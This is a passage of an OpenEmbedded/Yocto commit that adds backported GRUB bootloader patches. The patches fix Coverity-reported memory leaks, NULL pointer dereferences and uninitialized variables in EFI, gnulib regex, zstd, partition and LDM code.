+Fixes: CID 296222
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=ed286ceba6015d37a9304f04602451c47bf195d7]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/efi/efi.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/grub-core/kern/efi/efi.c b/grub-core/kern/efi/efi.c
+index 6a38080..baeeef0 100644
+--- a/grub-core/kern/efi/efi.c
++++ b/grub-core/kern/efi/efi.c
+@@ -415,6 +415,7 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
+ {
+ grub_error (GRUB_ERR_OUT_OF_RANGE,
+ "malformed EFI Device Path node has length=%d", len);
++ grub_free (name);
+ return NULL;
+ }
+
diff --git a/meta/recipes-bsp/grub/files/0007-kern-efi-mm-Fix-possible-NULL-pointer-dereference.patch b/meta/recipes-bsp/grub/files/0007-kern-efi-mm-Fix-possible-NULL-pointer-dereference.patch
new file mode 100644
index 0000000000..d55709406b
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0007-kern-efi-mm-Fix-possible-NULL-pointer-dereference.patch
@@ -0,0 +1,65 @@
+From be03a18b8767be50f16a845c389fd5ed29aae055 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 11 Dec 2020 15:03:13 +0000
+Subject: [PATCH] kern/efi/mm: Fix possible NULL pointer dereference
+
+The model of grub_efi_get_memory_map() is that if memory_map is NULL,
+then the purpose is to discover how much memory should be allocated to
+it for the subsequent call.
+
+The problem here is that with grub_efi_is_finished set to 1, there is no
+check at all that the function is being called with a non-NULL memory_map.
+
+While this MAY be true, we shouldn't assume it.
+
+The solution to this is to behave as expected, and if memory_map is NULL,
+then don't try to use it and allow memory_map_size to be filled in, and
+return 0 as is done later in the code if the buffer is too small (or NULL).
+
+Additionally, drop unneeded ret = 1.
+
+Fixes: CID 96632
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=6aee4bfd6973c714056fb7b56890b8d524e94ee1]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/efi/mm.c | 19 ++++++++++++++-----
+ 1 file changed, 14 insertions(+), 5 deletions(-)
+
+diff --git a/grub-core/kern/efi/mm.c b/grub-core/kern/efi/mm.c
+index b02fab1..5afcef7 100644
+--- a/grub-core/kern/efi/mm.c
++++ b/grub-core/kern/efi/mm.c
+@@ -328,15 +328,24 @@ grub_efi_get_memory_map (grub_efi_uintn_t *memory_map_size,
+ if (grub_efi_is_finished)
+ {
+ int ret = 1;
+- if (*memory_map_size < finish_mmap_size)
++
++ if (memory_map != NULL)
+ {
+- grub_memcpy (memory_map, finish_mmap_buf, *memory_map_size);
+- ret = 0;
++ if (*memory_map_size < finish_mmap_size)
++ {
++ grub_memcpy (memory_map, finish_mmap_buf, *memory_map_size);
++ ret = 0;
++ }
++ else
++ grub_memcpy (memory_map, finish_mmap_buf, finish_mmap_size);
+ }
+ else
+ {
+- grub_memcpy (memory_map, finish_mmap_buf, finish_mmap_size);
+- ret = 1;
++ /*
++ * Incomplete, no buffer to copy into, same as
++ * GRUB_EFI_BUFFER_TOO_SMALL below.
++ */
++ ret = 0;
+ }
+ *memory_map_size = finish_mmap_size;
+ if (map_key)
diff --git a/meta/recipes-bsp/grub/files/0008-gnulib-regexec-Resolve-unused-variable.patch b/meta/recipes-bsp/grub/files/0008-gnulib-regexec-Resolve-unused-variable.patch
new file mode 100644
index 0000000000..74ffb559e9
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0008-gnulib-regexec-Resolve-unused-variable.patch
@@ -0,0 +1,59 @@
+From 9d36bce5d516b6379ba3a0dd1a94a9c035838827 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Wed, 21 Oct 2020 14:41:27 +0000
+Subject: [PATCH] gnulib/regexec: Resolve unused variable
+
+This is a really minor issue where a variable is being assigned to but
+not checked before it is overwritten again.
+
+The reason for this issue is that we are not building with DEBUG set and
+this in turn means that the assert() that reads the value of the
+variable match_last is being processed out.
+
+The solution, move the assignment to match_last in to an ifdef DEBUG too.
+
+Fixes: CID 292459
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=a983d36bd9178d377d2072fd4b11c635fdc404b4]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ conf/Makefile.extra-dist | 1 +
+ .../lib/gnulib-patches/fix-unused-value.patch | 14 ++++++++++++++
+ 2 files changed, 15 insertions(+)
+ create mode 100644 grub-core/lib/gnulib-patches/fix-unused-value.patch
+
+diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
+index 46c4e95..9b01152 100644
+--- a/conf/Makefile.extra-dist
++++ b/conf/Makefile.extra-dist
+@@ -29,6 +29,7 @@ EXTRA_DIST += grub-core/genemuinit.sh
+ EXTRA_DIST += grub-core/genemuinitheader.sh
+
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
++EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-width.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/no-abort.patch
+
+diff --git a/grub-core/lib/gnulib-patches/fix-unused-value.patch b/grub-core/lib/gnulib-patches/fix-unused-value.patch
+new file mode 100644
+index 0000000..ba51f1b
+--- /dev/null
++++ b/grub-core/lib/gnulib-patches/fix-unused-value.patch
+@@ -0,0 +1,14 @@
++--- a/lib/regexec.c 2020-10-21 14:25:35.310195912 +0000
+++++ b/lib/regexec.c 2020-10-21 14:32:07.961765604 +0000
++@@ -828,7 +828,11 @@
++ break;
++ if (__glibc_unlikely (err != REG_NOMATCH))
++ goto free_return;
+++#ifdef DEBUG
+++ /* Only used for assertion below when DEBUG is set, otherwise
+++ it will be over-written when we loop around. */
++ match_last = -1;
+++#endif
++ }
++ else
++ break; /* We found a match. */
diff --git a/meta/recipes-bsp/grub/files/0009-gnulib-regcomp-Fix-uninitialized-token-structure.patch b/meta/recipes-bsp/grub/files/0009-gnulib-regcomp-Fix-uninitialized-token-structure.patch
new file mode 100644
index 0000000000..b6e3c7edbe
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0009-gnulib-regcomp-Fix-uninitialized-token-structure.patch
@@ -0,0 +1,53 @@
+From 2af8df02cca7fd4b584575eac304cd03fa23f5cc Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 22 Oct 2020 13:54:06 +0000
+Subject: [PATCH] gnulib/regcomp: Fix uninitialized token structure
+
+The code is assuming that the value of br_token.constraint was
+initialized to zero when it wasn't.
+
+While some compilers will ensure that, not all do, so it is better to
+fix this explicitly than leave it to chance.
+
+Fixes: CID 73749
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=75c3d3cec4f408848f575d6d5e30a95bd6313db0]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ conf/Makefile.extra-dist | 1 +
+ .../lib/gnulib-patches/fix-uninit-structure.patch | 11 +++++++++++
+ 2 files changed, 12 insertions(+)
+ create mode 100644 grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+
+diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
+index 9b01152..9e55458 100644
+--- a/conf/Makefile.extra-dist
++++ b/conf/Makefile.extra-dist
+@@ -29,6 +29,7 @@ EXTRA_DIST += grub-core/genemuinit.sh
+ EXTRA_DIST += grub-core/genemuinitheader.sh
+
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
++EXTRA_DIST += grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-width.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/no-abort.patch
+diff --git a/grub-core/lib/gnulib-patches/fix-uninit-structure.patch b/grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+new file mode 100644
+index 0000000..7b4d9f6
+--- /dev/null
++++ b/grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+@@ -0,0 +1,11 @@
++--- a/lib/regcomp.c 2020-10-22 13:49:06.770168928 +0000
+++++ b/lib/regcomp.c 2020-10-22 13:50:37.026528298 +0000
++@@ -3662,7 +3662,7 @@
++ Idx alloc = 0;
++ #endif /* not RE_ENABLE_I18N */
++ reg_errcode_t ret;
++- re_token_t br_token;
+++ re_token_t br_token = {0};
++ bin_tree_t *tree;
++
++ sbcset = (re_bitset_ptr_t) calloc (sizeof (bitset_t), 1);
diff --git a/meta/recipes-bsp/grub/files/0010-gnulib-argp-help-Fix-dereference-of-a-possibly-NULL-.patch b/meta/recipes-bsp/grub/files/0010-gnulib-argp-help-Fix-dereference-of-a-possibly-NULL-.patch
new file mode 100644
index 0000000000..102a494561
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0010-gnulib-argp-help-Fix-dereference-of-a-possibly-NULL-.patch
@@ -0,0 +1,52 @@
+From eaf9da8b5f8349c51cfc89dd8e39a1a61f89790a Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Wed, 28 Oct 2020 14:43:01 +0000
+Subject: [PATCH] gnulib/argp-help: Fix dereference of a possibly NULL state
+
+All other instances of call to __argp_failure() where there is
+a dgettext() call is first checking whether state is NULL before
+attempting to dereference it to get the root_argp->argp_domain.
+
+Fixes: CID 292436
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=3a37bf120a9194c373257c70175cdb5b337bc107]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ conf/Makefile.extra-dist | 1 +
+ .../lib/gnulib-patches/fix-null-state-deref.patch | 12 ++++++++++++
+ 2 files changed, 13 insertions(+)
+ create mode 100644 grub-core/lib/gnulib-patches/fix-null-state-deref.patch
+
+diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
+index 9e55458..96d7e69 100644
+--- a/conf/Makefile.extra-dist
++++ b/conf/Makefile.extra-dist
+@@ -29,6 +29,7 @@ EXTRA_DIST += grub-core/genemuinit.sh
+ EXTRA_DIST += grub-core/genemuinitheader.sh
+
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
++EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-state-deref.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-width.patch
+diff --git a/grub-core/lib/gnulib-patches/fix-null-state-deref.patch b/grub-core/lib/gnulib-patches/fix-null-state-deref.patch
+new file mode 100644
+index 0000000..813ec09
+--- /dev/null
++++ b/grub-core/lib/gnulib-patches/fix-null-state-deref.patch
+@@ -0,0 +1,12 @@
++--- a/lib/argp-help.c 2020-10-28 14:32:19.189215988 +0000
+++++ b/lib/argp-help.c 2020-10-28 14:38:21.204673940 +0000
++@@ -145,7 +145,8 @@
++ if (*(int *)((char *)upptr + up->uparams_offs) >= upptr->rmargin)
++ {
++ __argp_failure (state, 0, 0,
++- dgettext (state->root_argp->argp_domain,
+++ dgettext (state == NULL ? NULL
+++ : state->root_argp->argp_domain,
++ "\
++ ARGP_HELP_FMT: %s value is less than or equal to %s"),
++ "rmargin", up->name);
diff --git a/meta/recipes-bsp/grub/files/0011-gnulib-regexec-Fix-possible-null-dereference.patch b/meta/recipes-bsp/grub/files/0011-gnulib-regexec-Fix-possible-null-dereference.patch
new file mode 100644
index 0000000000..4f43fcf7d5
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0011-gnulib-regexec-Fix-possible-null-dereference.patch
@@ -0,0 +1,53 @@
+From 244dc2b1f518635069a556c424b2e7627f0cf036 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 5 Nov 2020 10:57:14 +0000
+Subject: [PATCH] gnulib/regexec: Fix possible null-dereference
+
+It appears to be possible that the mctx->state_log field may be NULL,
+and the name of this function, clean_state_log_if_needed(), suggests
+that it should be checking that it is valid to be cleaned before
+assuming that it does.
+
+Fixes: CID 86720
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=0b7f347638153e403ee2dd518af3ce26f4f99647]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ conf/Makefile.extra-dist | 1 +
+ .../lib/gnulib-patches/fix-regexec-null-deref.patch | 12 ++++++++++++
+ 2 files changed, 13 insertions(+)
+ create mode 100644 grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
+
+diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
+index 96d7e69..d27d3a9 100644
+--- a/conf/Makefile.extra-dist
++++ b/conf/Makefile.extra-dist
+@@ -30,6 +30,7 @@ EXTRA_DIST += grub-core/genemuinitheader.sh
+
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-state-deref.patch
++EXTRA_DIST += grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-width.patch
+diff --git a/grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch b/grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
+new file mode 100644
+index 0000000..db6dac9
+--- /dev/null
++++ b/grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
+@@ -0,0 +1,12 @@
++--- a/lib/regexec.c 2020-10-21 14:25:35.310195912 +0000
+++++ b/lib/regexec.c 2020-11-05 10:55:09.621542984 +0000
++@@ -1692,6 +1692,9 @@
++ {
++ Idx top = mctx->state_log_top;
++
+++ if (mctx->state_log == NULL)
+++ return REG_NOERROR;
+++
++ if ((next_state_log_idx >= mctx->input.bufs_len
++ && mctx->input.bufs_len < mctx->input.len)
++ || (next_state_log_idx >= mctx->input.valid_len
diff --git a/meta/recipes-bsp/grub/files/0012-gnulib-regcomp-Fix-uninitialized-re_token.patch b/meta/recipes-bsp/grub/files/0012-gnulib-regcomp-Fix-uninitialized-re_token.patch
new file mode 100644
index 0000000000..0507e0cd66
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0012-gnulib-regcomp-Fix-uninitialized-re_token.patch
@@ -0,0 +1,55 @@
+From 512b6bb380a77233b88c84b7a712896c70281d2f Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 24 Nov 2020 18:04:22 +0000
+Subject: [PATCH] gnulib/regcomp: Fix uninitialized re_token
+
+This issue has been fixed in the latest version of gnulib, so to
+maintain consistency, I've backported that change rather than doing
+something different.
+
+Fixes: CID 73828
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=03477085f9a33789ba6cca7cd49ab9326a1baa0e]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ conf/Makefile.extra-dist | 1 +
+ .../gnulib-patches/fix-regcomp-uninit-token.patch | 15 +++++++++++++++
+ 2 files changed, 16 insertions(+)
+ create mode 100644 grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch
+
+diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
+index d27d3a9..ffe6829 100644
+--- a/conf/Makefile.extra-dist
++++ b/conf/Makefile.extra-dist
+@@ -30,6 +30,7 @@ EXTRA_DIST += grub-core/genemuinitheader.sh
+
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-state-deref.patch
++EXTRA_DIST += grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
+diff --git a/grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch b/grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch
+new file mode 100644
+index 0000000..02e0631
+--- /dev/null
++++ b/grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch
+@@ -0,0 +1,15 @@
++--- a/lib/regcomp.c 2020-11-24 17:06:08.159223858 +0000
+++++ b/lib/regcomp.c 2020-11-24 17:06:15.630253923 +0000
++@@ -3808,11 +3808,7 @@
++ create_tree (re_dfa_t *dfa, bin_tree_t *left, bin_tree_t *right,
++ re_token_type_t type)
++ {
++- re_token_t t;
++-#if defined GCC_LINT || defined lint
++- memset (&t, 0, sizeof t);
++-#endif
++- t.type = type;
+++ re_token_t t = { .type = type };
++ return create_token_tree (dfa, left, right, &t);
++ }
++
diff --git a/meta/recipes-bsp/grub/files/0013-io-lzopio-Resolve-unnecessary-self-assignment-errors.patch b/meta/recipes-bsp/grub/files/0013-io-lzopio-Resolve-unnecessary-self-assignment-errors.patch
new file mode 100644
index 0000000000..1190b0d090
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0013-io-lzopio-Resolve-unnecessary-self-assignment-errors.patch
@@ -0,0 +1,41 @@
+From c529ca446424f1a9c64f0007dfe31fa7645d13ac Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Wed, 21 Oct 2020 14:44:10 +0000
+Subject: [PATCH] io/lzopio: Resolve unnecessary self-assignment errors
+
+These 2 assignments are unnecessary since they are just assigning
+to themselves.
+
+Fixes: CID 73643
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=59666e520f44177c97b82a44c169b3b315d63b42]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/io/lzopio.c | 4 ----
+ 1 file changed, 4 deletions(-)
+
+diff --git a/grub-core/io/lzopio.c b/grub-core/io/lzopio.c
+index 3014485..a7d4425 100644
+--- a/grub-core/io/lzopio.c
++++ b/grub-core/io/lzopio.c
+@@ -125,8 +125,6 @@ read_block_header (struct grub_lzopio *lzopio)
+ sizeof (lzopio->block.ucheck)) !=
+ sizeof (lzopio->block.ucheck))
+ return -1;
+-
+- lzopio->block.ucheck = lzopio->block.ucheck;
+ }
+
+ /* Read checksum of compressed data. */
+@@ -143,8 +141,6 @@ read_block_header (struct grub_lzopio *lzopio)
+ sizeof (lzopio->block.ccheck)) !=
+ sizeof (lzopio->block.ccheck))
+ return -1;
+-
+- lzopio->block.ccheck = lzopio->block.ccheck;
+ }
+ }
+
diff --git a/meta/recipes-bsp/grub/files/0014-zstd-Initialize-seq_t-structure-fully.patch b/meta/recipes-bsp/grub/files/0014-zstd-Initialize-seq_t-structure-fully.patch
new file mode 100644
index 0000000000..19d881c1ca
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0014-zstd-Initialize-seq_t-structure-fully.patch
@@ -0,0 +1,34 @@
+From f55ffe6bd8b844a8cd9956702f42ac2eb96ad56f Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 5 Nov 2020 10:29:59 +0000
+Subject: [PATCH] zstd: Initialize seq_t structure fully
+
+While many compilers will initialize this to zero, not all will, so it
+is better to be sure that fields not being explicitly set are at known
+values, and there is code that checks this fields value elsewhere in the
+code.
+
+Fixes: CID 292440
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=2777cf4466719921dbe4b30af358a75e7d76f217]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/lib/zstd/zstd_decompress.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/lib/zstd/zstd_decompress.c b/grub-core/lib/zstd/zstd_decompress.c
+index 711b5b6..e4b5670 100644
+--- a/grub-core/lib/zstd/zstd_decompress.c
++++ b/grub-core/lib/zstd/zstd_decompress.c
+@@ -1325,7 +1325,7 @@ typedef enum { ZSTD_lo_isRegularOffset, ZSTD_lo_isLongOffset=1 } ZSTD_longOffset
+ FORCE_INLINE_TEMPLATE seq_t
+ ZSTD_decodeSequence(seqState_t* seqState, const ZSTD_longOffset_e longOffsets)
+ {
+- seq_t seq;
++ seq_t seq = {0};
+ U32 const llBits = seqState->stateLL.table[seqState->stateLL.state].nbAdditionalBits;
+ U32 const mlBits = seqState->stateML.table[seqState->stateML.state].nbAdditionalBits;
+ U32 const ofBits = seqState->stateOffb.table[seqState->stateOffb.state].nbAdditionalBits;
diff --git a/meta/recipes-bsp/grub/files/0015-kern-partition-Check-for-NULL-before-dereferencing-i.patch b/meta/recipes-bsp/grub/files/0015-kern-partition-Check-for-NULL-before-dereferencing-i.patch
new file mode 100644
index 0000000000..af9fcd45cc
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0015-kern-partition-Check-for-NULL-before-dereferencing-i.patch
@@ -0,0 +1,43 @@
+From 0da8ef2e03a8591586b53a29af92d2ace76a04e3 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 23 Oct 2020 09:49:59 +0000
+Subject: [PATCH] kern/partition: Check for NULL before dereferencing input
+ string
+
+There is the possibility that the value of str comes from an external
+source and continuing to use it before ever checking its validity is
+wrong. So, needs fixing.
+
+Additionally, drop unneeded part initialization.
+
+Fixes: CID 292444
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=bc9c468a2ce84bc767234eec888b71f1bc744fff]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/partition.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/kern/partition.c b/grub-core/kern/partition.c
+index e499147..b10a184 100644
+--- a/grub-core/kern/partition.c
++++ b/grub-core/kern/partition.c
+@@ -109,11 +109,14 @@ grub_partition_map_probe (const grub_partition_map_t partmap,
+ grub_partition_t
+ grub_partition_probe (struct grub_disk *disk, const char *str)
+ {
+- grub_partition_t part = 0;
++ grub_partition_t part;
+ grub_partition_t curpart = 0;
+ grub_partition_t tail;
+ const char *ptr;
+
++ if (str == NULL)
++ return 0;
++
+ part = tail = disk->partition;
+
+ for (ptr = str; *ptr;)
diff --git a/meta/recipes-bsp/grub/files/0016-disk-ldm-Make-sure-comp-data-is-freed-before-exiting.patch b/meta/recipes-bsp/grub/files/0016-disk-ldm-Make-sure-comp-data-is-freed-before-exiting.patch
new file mode 100644
index 0000000000..c1687c75d0
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0016-disk-ldm-Make-sure-comp-data-is-freed-before-exiting.patch
@@ -0,0 +1,128 @@
+From 0c5d0fd796e6cafba179321de396681a493c4158 Mon Sep 17 00:00:00 2001
+From: Marco A Benatto <mbenatto@redhat.com>
+Date: Mon, 7 Dec 2020 11:53:03 -0300
+Subject: [PATCH] disk/ldm: Make sure comp data is freed before exiting from
+ make_vg()
+
+Several error handling paths in make_vg() do not free comp data before
+jumping to fail2 label and returning from the function. This will leak
+memory. So, let's fix all issues of that kind.
+
+Fixes: CID 73804
+
+Signed-off-by: Marco A Benatto <mbenatto@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=23e39f50ca7a107f6b66396ed4d177a914dee035]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/disk/ldm.c | 51 ++++++++++++++++++++++++++++++++++++++------
+ 1 file changed, 44 insertions(+), 7 deletions(-)
+
+diff --git a/grub-core/disk/ldm.c b/grub-core/disk/ldm.c
+index 58f8a53..428415f 100644
+--- a/grub-core/disk/ldm.c
++++ b/grub-core/disk/ldm.c
+@@ -554,7 +554,11 @@ make_vg (grub_disk_t disk,
+ comp->segments = grub_calloc (comp->segment_alloc,
+ sizeof (*comp->segments));
+ if (!comp->segments)
+- goto fail2;
++ {
++ grub_free (comp->internal_id);
++ grub_free (comp);
++ goto fail2;
++ }
+ }
+ else
+ {
+@@ -562,7 +566,11 @@ make_vg (grub_disk_t disk,
+ comp->segment_count = 1;
+ comp->segments = grub_malloc (sizeof (*comp->segments));
+ if (!comp->segments)
+- goto fail2;
++ {
++ grub_free (comp->internal_id);
++ grub_free (comp);
++ goto fail2;
++ }
+ comp->segments->start_extent = 0;
+ comp->segments->extent_count = lv->size;
+ comp->segments->layout = 0;
+@@ -574,15 +582,26 @@ make_vg (grub_disk_t disk,
+ comp->segments->layout = GRUB_RAID_LAYOUT_SYMMETRIC_MASK;
+ }
+ else
+- goto fail2;
++ {
++ grub_free (comp->segments);
++ grub_free (comp->internal_id);
++ grub_free (comp);
++ goto fail2;
++ }
+ ptr += *ptr + 1;
+ ptr++;
+ if (!(vblk[i].flags & 0x10))
+- goto fail2;
++ {
++ grub_free (comp->segments);
++ grub_free (comp->internal_id);
++ grub_free (comp);
++ goto fail2;
++ }
+ if (ptr >= vblk[i].dynamic + sizeof (vblk[i].dynamic)
+ || ptr + *ptr + 1 >= vblk[i].dynamic
+ + sizeof (vblk[i].dynamic))
+ {
++ grub_free (comp->segments);
+ grub_free (comp->internal_id);
+ grub_free (comp);
+ goto fail2;
+@@ -592,6 +611,7 @@ make_vg (grub_disk_t disk,
+ if (ptr + *ptr + 1 >= vblk[i].dynamic
+ + sizeof (vblk[i].dynamic))
+ {
++ grub_free (comp->segments);
+ grub_free (comp->internal_id);
+ grub_free (comp);
+ goto fail2;
+@@ -601,7 +621,12 @@ make_vg (grub_disk_t disk,
+ comp->segments->nodes = grub_calloc (comp->segments->node_alloc,
+ sizeof (*comp->segments->nodes));
+ if (!lv->segments->nodes)
+- goto fail2;
++ {
++ grub_free (comp->segments);
++ grub_free (comp->internal_id);
++ grub_free (comp);
++ goto fail2;
++ }
+ }
+
+ if (lv->segments->node_alloc == lv->segments->node_count)
+@@ -611,11 +636,23 @@ make_vg (grub_disk_t disk,
+
+ if (grub_mul (lv->segments->node_alloc, 2, &lv->segments->node_alloc) ||
+ grub_mul (lv->segments->node_alloc, sizeof (*lv->segments->nodes), &sz))
+- goto fail2;
++ {
++ grub_free (comp->segments->nodes);
++ grub_free (comp->segments);
++ grub_free (comp->internal_id);
++ grub_free (comp);
++ goto fail2;
++ }
+
+ t = grub_realloc (lv->segments->nodes, sz);
+ if (!t)
+- goto fail2;
++ {
++ grub_free (comp->segments->nodes);
++ grub_free (comp->segments);
++ grub_free (comp->internal_id);
++ grub_free (comp);
++ goto fail2;
++ }
+ lv->segments->nodes = t;
+ }
+ lv->segments->nodes[lv->segments->node_count].pv = 0;
diff --git a/meta/recipes-bsp/grub/files/0017-disk-ldm-If-failed-then-free-vg-variable-too.patch b/meta/recipes-bsp/grub/files/0017-disk-ldm-If-failed-then-free-vg-variable-too.patch
new file mode 100644
index 0000000000..ecdb230f76
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0017-disk-ldm-If-failed-then-free-vg-variable-too.patch
@@ -0,0 +1,28 @@
+From 253485e8df3c9dedac848567e638157530184295 Mon Sep 17 00:00:00 2001
+From: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Date: Mon, 7 Dec 2020 10:07:47 -0300
+Subject: [PATCH] disk/ldm: If failed then free vg variable too
+
+Fixes: CID 73809
+
+Signed-off-by: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=e0b83df5da538d2a38f770e60817b3a4b9d5b4d7]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/disk/ldm.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/grub-core/disk/ldm.c b/grub-core/disk/ldm.c
+index 428415f..54713f4 100644
+--- a/grub-core/disk/ldm.c
++++ b/grub-core/disk/ldm.c
